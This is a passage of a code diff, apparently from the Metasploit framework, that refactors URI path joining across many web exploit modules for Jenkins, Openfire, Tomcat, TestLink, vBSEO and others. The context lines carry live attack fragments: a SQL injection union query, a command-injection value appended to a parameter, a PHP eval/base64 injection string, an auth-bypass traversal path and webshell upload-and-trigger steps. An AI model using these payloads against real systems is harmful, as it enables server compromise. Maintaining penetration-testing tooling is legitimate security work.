+314,7 @@ def on_request_uri(cli, request) def query_serverinfo - path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo' + path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo' res = send_request_raw( { 'uri' => path diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index bc195f03a921..bd825a7a004e 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -73,7 +73,7 @@ def on_new_session(client) def http_send_command(cmd, opts = {}) request_parameters = { 'method' => 'POST', - 'uri' => "#{@uri.path}script", + 'uri' => normalize_uri(@uri.path, "script"), 'vars_post' => { 'script' => java_craft_runtime_exec(cmd), @@ -150,7 +150,7 @@ def exploit print_status('Logging in...') res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{@uri.path}j_acegi_security_check", + 'uri' => normalize_uri(@uri.path, "j_acegi_security_check"), 'vars_post' => { 'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'), diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb index 0206ac51f754..98f2f7ebda21 100644 --- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb +++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb @@ -66,7 +66,7 @@ def check res = send_request_raw({ 'method' => 'GET', - 'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php" + 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php") }) if res and res.code == 200 @@ -87,14 +87,14 @@ def exploit print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)") send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php", + 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"), 'data' => php }) print_status("#{peer} - Requesting data.php") send_request_raw({ 'method' => 'GET', - 'uri' => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php" + 'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php') }) handler diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index fbe992bc3af9..61f076de2f71 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -64,7 +64,7 @@ def check uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") - res = send_request_raw({'uri'=>"#{base}/index.php"}) + res = send_request_raw({'uri'=>normalize_uri(uri, "/index.php")}) if res and res.body =~ /MobileCartly/ return Exploit::CheckCode::Detected else @@ -93,7 +93,7 @@ def exploit # print_status("#{@peer} - Uploading payload") res = send_request_cgi({ - 'uri' => "#{base}/includes/savepage.php", + 'uri' => normalize_uri(base, "/includes/savepage.php"), 'vars_get' => { 'savepage' => php_fname, 'pagecontent' => get_write_exec_payload(:unlink_self=>true) @@ -109,7 +109,7 @@ def exploit # Run payload # print_status("#{@peer} - Requesting '#{php_fname}'") - send_request_cgi({ 'uri' => "#{base}/pages/#{php_fname}" }) + send_request_cgi({ 'uri' => normalize_uri(base, pages, php_fname) }) handler end diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 96c4a846cb19..0347f055039e 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -98,7 +98,7 @@ def exploit end def http_send_raw(cmd) - path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi' + path = normalize_uri(target_uri.path, '/mt-upgrade.cgi') pay = cmd.gsub('\\', '\\\\').gsub('"', '\"') send_request_cgi( { diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index 4f4557bb8026..a7fc47a52b64 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -89,10 +89,10 @@ def initialize(info = {}) end def check - base = normalize_uri(target_uri.path) + base = target_uri.path base << '/' if base[-1, 1] != '/' - path = "#{base}login.jsp" + path = normalize_uri(base, "login.jsp") res = send_request_cgi( { 'uri' => path @@ -183,7 +183,7 @@ def exploit data << "\r\n--#{boundary}--" res = send_request_cgi({ - 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin", + 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"), 'method' => 'POST', 'data' => data, 'headers' => @@ -201,7 +201,7 @@ def exploit if datastore['REMOVE_PLUGIN'] print_status("Deleting plugin #{plugin_name} from the server") res = send_request_cgi({ - 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}", + 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase, 'headers' => { 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index 3fa5bff9076b..1e95400a8056 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -252,7 +252,7 @@ def exploit print_status("Trying file: #{f}") send_request_raw({ 'method' => 'GET', - 'uri' => "#{base}mods/documents/uploads/#{f}", + 'uri' => normalize_uri(base, 'mods/documents/uploads/', f), 'cookie' => cookie }) end diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index 7e1bee9ef4f4..6052a86061de 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -56,9 +56,7 @@ def initialize(info = {}) end def check - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'index.php' + uri = normalize_uri(datastore['URI'], 'index.php') res = send_request_raw( { @@ -74,9 +72,7 @@ def check end def get_session - uri normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'index.php' + uri = normalize_uri(datastore['URI'], 'index.php') res = send_request_raw( { diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 3de593e6cd85..d0733a8efb1d 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -73,13 +73,12 @@ def check def exploit - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path print_status("#{rhost}#{rport} - Sending request...") res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}drawimage.php", + 'uri' => normalize_uri(uri, "drawimage.php"), 'vars_get' => { 'pdf' => 'make', 'pfilez' => "xxx; #{payload.encoded}" diff --git a/modules/exploits/multi/http/plone_popen2.rb b/modules/exploits/multi/http/plone_popen2.rb index 10c502fc7f53..1015e29dd69b 100644 --- a/modules/exploits/multi/http/plone_popen2.rb +++ b/modules/exploits/multi/http/plone_popen2.rb @@ -61,9 +61,7 @@ def initialize(info={}) end def check - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2' + uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2') res = send_request_raw( { @@ -77,9 +75,7 @@ def check end def exploit - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2' + uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2') send_request_cgi( { diff --git a/modules/exploits/multi/http/pmwiki_pagelist.rb b/modules/exploits/multi/http/pmwiki_pagelist.rb index 9bbbcb39674a..15526994829a 100644 --- a/modules/exploits/multi/http/pmwiki_pagelist.rb +++ b/modules/exploits/multi/http/pmwiki_pagelist.rb @@ -73,8 +73,7 @@ def exploit header = rand_text_alpha_upper(3) header_append = rand_text_alpha_upper(4) - uri = normalize_uri(datastore['URI']) - uri += (datastore['URI'][-1, 1] == "/") ? 'pmwiki.php' : '/pmwiki.php' + uri = normalize_uri(datastore['URI'], "pmwiki.php") res = send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 39df154e4fe8..47959f1b7138 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -65,7 +65,7 @@ def check uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") - res = send_request_raw({'uri'=>"#{base}/index.php"}) + res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")}) if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m major, minor = $1, $2 return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70 @@ -112,7 +112,7 @@ def login(base, username, password) # Login res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}/index.php/home/login", + 'uri' => normalize_uri("#{base}/index.php/home/login"), 'vars_post' => { 'login[email]' => username, 'login[password]' => password, @@ -187,7 +187,7 @@ def upload_php(base, opts) res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}/index.php/home/myAccount", + 'uri' => normalize_uri("#{base}/index.php/home/myAccount"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'cookie' => cookie, @@ -205,7 +205,7 @@ def exec_php(base, opts) # When we upload a file, it will be renamed. The 'myAccount' page has that info. res = send_request_cgi({ - 'uri' => "#{base}/index.php/home/myAccount", + 'uri' => normalize_uri("#{base}/index.php/home/myAccount"), 'cookie' => cookie }) diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index 830202444bdc..cf46bf92d7ac 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -64,12 +64,7 @@ def initialize(info = {}) def check - uri = normalize_uri(datastore['URI']) - if uri[-1,1] != '/' - uri = uri + "index.php" - else - uri = uri + "/index.php" - end + uri = normalize_uri(datastore['URI'], "index.php") res = send_request_raw({ 'uri' => uri @@ -91,12 +86,7 @@ def check def retrieve_session(user, pass) - uri = normalize_uri(datastore['URI']) - if uri[-1,1] == "/" - uri = uri + "login.php" - else - uri = uri + "/login.php" - end + uri = normalize_uri(datastore['URI'], "login.php") res = send_request_cgi({ 'uri' => uri, @@ -121,12 +111,7 @@ def retrieve_session(user, pass) def upload_page(session, newpage, contents) - uri = normalize_uri(datastore['URI']) - if uri[-1,1] == "/" - uri = uri + "ftp_upload_file.php" - else - uri = uri + "/ftp_upload_file.php" - end + uri = normalize_uri(datastore['URI'], "ftp_upload_file.php") boundary = rand_text_alphanumeric(6) @@ -187,12 +172,7 @@ def retrieve_upload_dir(session) def cmd_shell(cmdpath) print_status("Calling payload: #{cmdpath}") - uri = normalize_uri(datastore['URI']) - if uri[-1,1] == "/" - uri = uri + cmdpath - else - uri = uri + "/#{cmdpath}" - end + uri = normalize_uri(datastore['URI'], cmdpath) send_request_raw({ 'uri' => uri diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 4abf1ce64523..61d7a559d76c 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -264,7 +264,7 @@ def exploit print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") res = send_request_cgi( { - 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", + 'uri' => normalize_uri("#{@uri}appliance/#{@jsp_name}.jsp"), 'method' => 'GET' }) diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index 28f3e0854e65..d91113a0653f 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -59,7 +59,7 @@ def initialize(info={}) def check - base = normalize_uri(target_uri.path) + base = target_uri.path base << '/' if base[-1, 1] != '/' peer = "#{rhost}:#{rport}" @@ -67,7 +67,7 @@ def check begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}login.php" + 'uri' => normalize_uri(base, "login.php") }) return Exploit::CheckCode::Unknown if res.nil? @@ -185,7 +185,7 @@ def exploit begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}lib/attachments/attachmentupload.php?id=#{id}&tableName=#{table}", + 'uri' => normalize_uri(base, "lib/attachments/attachmentupload.php") + "?id=#{id}&tableName=#{table}", 'cookie' => datastore['COOKIE'], }) if res and res.code == 200 @@ -221,7 +221,7 @@ def exploit begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}upload_area/#{table}/#{id}/" + 'uri' => normalize_uri(base, "upload_area", table, id) }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 @@ -238,11 +238,11 @@ def exploit # attempt to retrieve real file name from the database if @token.nil? print_status("#{@peer} - Retrieving real file name from the database.") - sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" + sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}#{sqli}", + 'uri' => sqli, 'cookie' => datastore['COOKIE'], }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @@ -263,7 +263,7 @@ def exploit begin send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php" + 'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php") }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_error("#{@peer} - Connection failed") diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 5fdf162a99c1..a46cd2c033f5 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -198,7 +198,7 @@ def exploit # # UPLOAD # - path_tmp = normalize_uri(datastore['PATH']) + "/deploy" + query_str + path_tmp = normalize_uri(datastore['PATH'], "deploy") + query_str print_status("Uploading #{war.length} bytes as #{app_base}.war ...") res = send_request_cgi({ 'uri' => path_tmp, @@ -247,7 +247,7 @@ def exploit # # DELETE # - path_tmp = normalize_uri(datastore['PATH']) + "/undeploy" + query_str + path_tmp = normalize_uri(datastore['PATH'], "/undeploy") + query_str print_status("Undeploying #{app_base} ...") res = send_request_cgi({ 'uri' => path_tmp, @@ -263,7 +263,7 @@ def exploit end def query_serverinfo() - path = normalize_uri(datastore['PATH']) + '/serverinfo' + path = normalize_uri(datastore['PATH'], '/serverinfo') res = send_request_raw( { 'uri' => path diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index 54565c898e8e..ca61aeed054a 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb @@ -58,8 +58,7 @@ def initialize(info={}) end def check - uri = normalize_uri(datastore['URI']) - uri += (uri[-1, 1] == "/") ? "admincp/login.php" : "/admincp/login.php" + uri = normalize_uri(datastore['URI'], "admincp", "login.php") res = send_request_raw( { @@ -75,8 +74,7 @@ def check def exploit p = Rex::Text.encode_base64(payload.encoded) - uri = normalize_uri(datastore['URI']) - uri += (uri[-1, 1] == "/") ? "admincp/plugins.php?newhook" : "/admincp/plugins.php?newhook" + uri = normalize_uri(datastore['URI'], "admincp", "plugins.php") + "?newhook" res = send_request_cgi( { @@ -92,8 +90,7 @@ def exploit } }, 25) - uri = normalize_uri(datastore['URI']) - uri += (uri[-1, 1] == "/") ? "index.php" : "/index.php" + uri = normalize_uri(datastore['URI'], "index.php") res = send_request_cgi( { diff --git a/modules/exploits/multi/http/vbseo_proc_deutf.rb b/modules/exploits/multi/http/vbseo_proc_deutf.rb index 5735349a01e8..3745fe16e3ef 100644 --- a/modules/exploits/multi/http/vbseo_proc_deutf.rb +++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb @@ -55,9 +55,7 @@ def check flag = rand_text_alpha(rand(10)+10) data = "char_repl='{${print(#{flag})}}'=>" - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'vbseocp.php' + uri = normalize_uri(datastore['URI'], 'vbseocp.php') response = send_request_cgi({ 'method' => "POST", @@ -82,9 +80,7 @@ def exploit data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>" - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'vbseocp.php' + uri = normalize_uri(datastore['URI'], 'vbseocp.php') response = send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index f4ba74ac4203..e93870a0bf72 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -63,8 +63,8 @@ def check uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") - res1 = send_request_raw({'uri'=>"#{base}/index.php"}) - res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"}) + res1 = send_request_raw({'uri'=>normalize_uri("#{base}/index.php")}) + res2 = send_request_raw({'uri'=>normalize_uri("#{base}/work/resultimage.php")}) if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and res2 and res2.code == 200 @@ -111,7 +111,7 @@ def exploit print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}/work/resultimage.php", + 'uri' => normalize_uri("#{base}/work/resultimage.php"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s }) @@ -121,7 +121,7 @@ def exploit return end - @target_path = "#{base}/results/#{fname}" + @target_path = normalize_uri("#{base}/results/#{fname}") print_status("#{peer} - Requesting #{@target_path}") res = send_request_cgi({'uri'=>@target_path}) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index f2c8d8de11e4..000336b98be8 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -87,7 +87,7 @@ def check def get_cookie res = send_request_raw({ 'method' => 'GET', - 'uri' => "#{@base}wikka.php" + 'uri' => normalize_uri(@base, "wikka.php") }) # Get the cookie in this format: @@ -107,7 +107,7 @@ def get_cookie # def login(cookie) # Send a request to the login page so we can obtain some hidden values needed for login - uri = "#{@base}wikka.php?wakka=UserSettings" + uri = normalize_uri(@base, "wikka.php") + "?wakka=UserSettings" res = send_request_raw({ 'method' => 'GET', 'uri' => uri, @@ -163,7 +163,7 @@ def inject_exec(cookie) # Get the necessary fields in order to post a comment res = send_request_raw({ 'method' => 'GET', - 'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1", + 'uri' => normalize_uri(@base, "wikka.php") + "?wakka=#{datastore['PAGE']}&show_comments=1", 'cookie' => cookie }) @@ -189,11 +189,11 @@ def inject_exec(cookie) # Inject payload b64_payload = Rex::Text.encode_base64(payload.encoded) port = (rport.to_i == 80) ? "" : ":#{rport}" - uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment" + uri = normalize_uri("#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment") post_data = "" send_request_cgi({ 'method' => 'POST', - 'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment", + 'uri' => uri, 'cookie' => cookie, 'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" }, 'vars_post' => fields, @@ -202,7 +202,7 @@ def inject_exec(cookie) send_request_raw({ 'method' => 'GET', - 'uri' => "#{@base}spamlog.txt.php" + 'uri' => normalize_uri(@base, "spamlog.txt.php") }) end diff --git a/modules/exploits/unix/webapp/basilic_diff_exec.rb b/modules/exploits/unix/webapp/basilic_diff_exec.rb index 3fde5b946af7..c8a99cdb92fe 100644 --- a/modules/exploits/unix/webapp/basilic_diff_exec.rb +++ b/modules/exploits/unix/webapp/basilic_diff_exec.rb @@ -61,12 +61,11 @@ def initialize(info = {}) def check base = normalize_uri(target_uri.path) - base << '/' if base[-1, 1] != '/' sig = rand_text_alpha(10) res = send_request_cgi({ - 'uri' => "/#{base}/Config/diff.php", + 'uri' => normalize_uri("/#{base}/Config/diff.php"), 'vars_get' => { 'file' => sig, 'new' => '1', @@ -86,10 +85,9 @@ def exploit print_status("Sending GET request...") base = normalize_uri(target_uri.path) - base << '/' if base[-1, 1] != '/' res = send_request_cgi({ - 'uri' => "/#{base}/Config/diff.php", + 'uri' => normalize_uri("/#{base}/Config/diff.php"), 'vars_get' => { 'file' => "&#{payload.encoded} #", 'new' => '1', diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 772eeb722c0a..170db130fce6 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -71,7 +71,7 @@ def initialize(info = {}) def check res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + '/picEditor.php' + 'uri' => normalize_uri(datastore['URI'], '/picEditor.php') }, 25) if (res and res.body =~ /Coppermine Picture Editor/i) @@ -98,7 +98,7 @@ def exploit res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['URI']) + "/picEditor.php", + 'uri' => normalize_uri(datastore['URI'], "/picEditor.php"), 'vars_post' => { 'angle' => angle, diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index 58b051af1b8f..9dc2044cd7e1 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -58,12 +58,11 @@ def initialize(info={}) end def check - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}egallery/uploadify.php" + 'uri' => normalize_uri(uri, "egallery", "uploadify.php") }) if res and res.code == 200 and res.body.empty? @@ -97,7 +96,7 @@ def exploit print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}egallery/uploadify.php", + 'uri' => normalize_uri("#{uri}egallery/uploadify.php"), 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => post_data }) @@ -113,7 +112,7 @@ def exploit # Execute our payload res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}#{payload_name}" + 'uri' => normalize_uri("#{uri}#{payload_name}") }) # If we don't get a 200 when we request our malicious payload, we suspect diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 0ccb1efcfdfd..c7fa522c9fd6 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -54,9 +54,8 @@ def initialize(info = {}) end def check - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=' + uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php') + uri << '?type=file&folder=' res = send_request_raw( { 'uri' => uri diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index 7f9b9cd6f0c2..546bd1cf11a7 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -68,9 +68,7 @@ def initialize(info = {}) end def check - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'www/admin/' + uri = normalize_uri(datastore['URI'], 'www', 'admin/') res = send_request_raw( { 'uri' => uri @@ -108,9 +106,7 @@ def exploit # Static files img_dir = 'images/' - uri_base = normalize_uri(datastore['URI']) - uri_base << '/' if uri_base[-1,1] != '/' - uri_base << 'www/' + uri_base = normalize_uri(datastore['URI'], 'www/') # Need to login first :-/ cookie = openx_login(uri_base) @@ -166,7 +162,7 @@ def openx_login(uri_base) res = send_request_raw( { - 'uri' => uri_base + 'admin/index.php' + 'uri' => normalize_uri(uri_base, 'admin/index.php') }, 10) if not (res and res.body =~ /oa_cookiecheck\" value=\"([^\"]+)\"/) return nil @@ -176,7 +172,7 @@ def openx_login(uri_base) res = send_request_cgi( { 'method' => 'POST', - 'uri' => uri_base + 'admin/index.php', + 'uri' => normalize_uri(uri_base, 'admin/index.php'), 'vars_post' => { 'oa_cookiecheck' => cookie, @@ -201,7 +197,7 @@ def openx_login(uri_base) def openx_find_campaign(uri_base, cookie) res = send_request_raw( { - 'uri' => uri_base + 'admin/advertiser-campaigns.php', + 'uri' => normalize_uri(uri_base, 'admin/advertiser-campaigns.php'), 'headers' => { 'Cookie' => "sessionID=#{cookie}; PHPSESSID=#{cookie}", @@ -269,7 +265,7 @@ def openx_upload_banner(uri_base, cookie, adv_id, camp_id, code_img) res = send_request_raw( { - 'uri' => uri_base + "admin/banner-edit.php", + 'uri' => normalize_uri(uri_base, "admin/banner-edit.php"), 'method' => 'POST', 'data' => data, 'headers' => @@ -287,7 +283,7 @@ def openx_upload_banner(uri_base, cookie, adv_id, camp_id, code_img) # Ugh, now we have to get the banner id! res = send_request_raw( { - 'uri' => uri_base + "admin/campaign-banners.php?clientid=#{adv_id}&campaignid=#{camp_id}", + 'uri' => normalize_uri(uri_base, "admin/campaign-banners.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}", 'method' => 'GET', 'headers' => { @@ -319,7 +315,7 @@ def openx_find_banner_filename(uri_base, cookie, adv_id, camp_id, ban_id) # Ugh, now we have to get the banner name too! res = send_request_raw( { - 'uri' => uri_base + "admin/banner-edit.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}", + 'uri' => normalize_uri(uri_base, "admin/banner-edit.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}", 'method' => 'GET', 'headers' => { @@ -338,7 +334,7 @@ def openx_find_banner_filename(uri_base, cookie, adv_id, camp_id, ban_id) def openx_banner_delete(uri_base, cookie, adv_id, camp_id, ban_id) res = send_request_raw( { - 'uri' => uri_base + "admin/banner-delete.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}", + 'uri' => normalize_uri(uri_base, "admin/banner-delete.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}", 'method' => 'GET', 'headers' => { diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index 66fa7d4ca279..7ca3dc9b5899 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb +++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -78,7 +78,7 @@ def exploit print_status("Sending file save request") response = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + "/" + "admin/file_manager.php/login.php?action=save", + 'uri' => normalize_uri(datastore['URI'], "admin/file_manager.php/login.php") + "?action=save", 'method' => 'POST', 'data' => data, 'headers' => @@ -101,7 +101,7 @@ def exploit response = send_request_raw({ # Allow findsock payloads to work 'global' => true, - 'uri' => normalize_uri(datastore['URI']) + "/" + File.basename(filename) + 'uri' => normalize_uri(datastore['URI'], File.basename(filename)) }, timeout) handler diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb index 9526b9f2fa63..e6fcd817266d 100644 --- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb +++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb @@ -54,12 +54,11 @@ def initialize(info = {}) end def check - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php" + 'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php") }) if res and res.code == 200 @@ -83,7 +82,7 @@ def exploit res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php", + 'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"), 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, 'data' => post_data.to_s }) @@ -96,7 +95,7 @@ def exploit print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...") res = send_request_cgi({ 'method' => 'GET', - 'uri' => 